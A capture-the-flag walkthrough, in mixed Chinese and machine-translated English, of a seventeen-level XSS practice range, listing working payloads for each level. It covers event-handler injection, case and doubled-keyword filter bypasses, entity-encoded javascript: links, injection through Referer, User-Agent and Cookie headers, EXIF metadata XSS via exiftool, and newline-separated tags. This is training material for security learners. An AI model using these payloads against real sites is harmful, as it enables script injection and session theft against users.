Range Address: http://xss.tesla-space.com/?tdsourcetag=s_pcqq_aiomsg
first round
http://xss.tesla-space.com/level1.php?name=test
name=<script>alert("xss")</script>
Closed bypass label
The second hurdle
http://xss.tesla-space.com/level2.php?keyword=test
View source
playload:
""><script>alert("xss")</script><"
" onclick=alert(/xss/)><" (点击)
Third off
http://xss.tesla-space.com/level3.php?keyword=a
View source
Input ""> <script> alert ( "xss") </ script> < "try, find a filter
playload:
' onclick='alert(1) (点击)
' oninput='alert(1) (输入)
Successfully bypassed
Fourth off
xss.tesla-space.com/level4.php?keyword=a
Single quote becomes double quotes
playload:
"onclick="alert(1)
" onclick=alert(/xss/)//
bypass the javascript pseudo-protocol
The case can not be closed double quotation marks, you can not use the onclick event, etc., can bypass the pseudo-protocol, or call external js
Fifth off
View source
Filter on the series, script
playload: "><a href=javascript:alert(/xss/)>xss</a>
Successfully bypassed, as
Sixth off
Input "> <a href=javascript:alert(/xss/)> xss </a>, found herf is filtered, try the case
playload:
"><a Href=javascript:alert(/xss/)>xss</a>
"><Script>alert(/xss/)</script>
Write double bypass
The seventh off
http://xss.tesla-space.com/level7.php?keyword=move%20up
输入:"><a Href=javascript:alert(/xss/)>xss</a>
输入:"><Script>alert(/xss/)</script>
Input: "onclick =" alert (1)
Keywords are found to be filtered, the case does not help, write double
playload:
"oonnclick="alert(1)
"> <scrscriptipt>alert("yes")</scrscriptipt>
"oonnclick="alert(1)后成功,结果如图:
实体编码绕过
第八关
http://xss.tesla-space.com/level8.php?keyword=nice%20try
输入"><"
发现有过滤,但有个 a herf,输入javascript:alert(/xss/)
发现被编码
实体编码网址:https://www.qqxiuzi.cn/bianma/zifushiti.php
对t进行编码
十进制实体编码:javascript:alert(/xss/)
十六进制实体编码:javascript:alert(/xss/)
第九关
输入上一关的playload,
ref里直接显示链接不合法,测试发现输入中必须包含http
playload:javascript:alert(/xss/)//http://www.baidu.com
第十关
对输出进行了编码,下面有三个输入处被隐藏
playload:t_link=&t_history=&t_sort="onclick="alert()"type="text
成功利用,结果如图:
type="text" 因为页面中没有触发事件框,所以type="text"构造一个文本框
抓包利用
第十一关
http://xss.tesla-space.com/level11.php?keyword=text
构造同是个那一关的playload,发现不是这么简单,一个也用不上,没想明白,上网查
抓包构造Referer(咋想到的?)
Referer:1" type="text" onclick="alert(1)
成功利用,结果如图
第十二关
http://xss.tesla-space.com/level12.php?keyword=good%20job!
这个一看就是伪造头
User-Agent:1"type="text" onclick="alert(1)
成功利用,结果如图
第十三关
http://xss.tesla-space.com/level13.php?keyword=good%20job!
利用cookie
1"type="text" onclick="alert(1)
成功利用,结果如图
第十四关
http://xss.tesla-space.com/level14.php
查看源码发现exif,猜测应该是exif xss
exif xss,一般利用于文件上传的地方,最经典的就是头像上传,上传一个图片,该图片的exif元数据被修改为xss payload,成功利用弹窗
具体实现使用kali下的exiftool工具
命令如下:
exiftool -FIELD=XSS FILE
exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ brute.jpeg
第十五关
http://xss.tesla-space.com/level15.php
ng-include,这个属性可以包含文件,默认是同域名的文件
构造playload:http://xss.tesla-space.com/level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
第十六关
http://xss.tesla-space.com/level16.php?keyword=<script>
这一关过滤了空格, script, /
特点:利用%0d、%0a(回车换行)实现xss攻击绕过
playload:
<img%0asrc=x%0aonerror=alert(1)>
<svg%0aonload=alert(1)>
<img%0dsrc=1%0donerror=alert(1)>
第十七关
http://xss.tesla-space.com/level17.php
http://xss.tesla-space.com/level17.php?arg01=a&arg02=b
arg02= onmouseover=alert(1)
arg02=%20onclick=alert(1)